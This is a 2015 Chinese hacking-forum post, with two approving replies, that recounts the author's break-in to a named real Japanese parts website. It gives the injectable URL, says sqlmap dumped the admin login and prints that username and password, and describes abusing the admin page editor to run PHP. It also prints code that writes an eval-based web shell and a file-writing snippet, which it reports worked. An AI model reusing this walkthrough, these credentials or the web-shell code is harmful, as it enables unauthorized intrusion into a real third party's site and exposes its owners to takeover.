搜索
查看: 807|回复: 2

无聊拿个日本站

[复制链接]

1839

主题

2255

帖子

1万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
11913
发表于 2015-9-14 22:15:43 | 显示全部楼层 |阅读模式

目標站:http://www.partsclub.jp/

首先:http://www.partsclub.jp/search/s ... scode=1328505750%27  存在注入


丟给sqlmap跑  得管理账號:admin  密码:ecbbadmin


http://www.partsclub.jp/admin/prog/


找到一个上传,不过不能利用  所以小编我翻啊翻


找到一个编辑网页的地方


https://www.partsclub.jp/admin/prog/html.php


我们添加一个php试试。


好吧只能用html  我试过1.php.html也不行


突然发现可以执行php代码。。。


不过如果shell很好拿我就不会发这篇文章了- -


使用帝国CMS拿shell语句


执行


  1. <?fputs(fopen("x.php","w"),"<?eval($_POST[cmd]);?>")?>
复制代码




蛋疼了  没权限。。。


之后执行


  1. <span style="color: rgb(96, 96, 96); font-family: 'Microsoft YaHei', Arial, 'Open Sans', SimSun, sans-serif; font-size: 20.8px; line-height: 37.44px; text-indent: 41.6px;"><?php</span>
复制代码


日狗  函数禁用。


后来到外国网站找方法  他们说用fwrite就可以写入了,我来试试看。

  1. <?php
  2. $fh = fopen("shell.php", "wb");
  3. fwrite($fh, "<?phpinfo();?>");
  4. fclose($fh);
  5. ?>
复制代码



醉了,,我忘记没权限写入这个目录,加上物理路径即可。



成功写入。


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?Join BUC

x
过段时间可能会取消签到功能了
北鸳 该用户已被删除
发表于 2015-9-16 23:53:04 | 显示全部楼层
这个可以有。。,

4

主题

83

帖子

253

积分

我是新手

Rank: 1

积分
253
发表于 2015-9-25 21:09:51 | 显示全部楼层
不错,为老大点个赞
体验为王,用户至上,诚信为本。
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表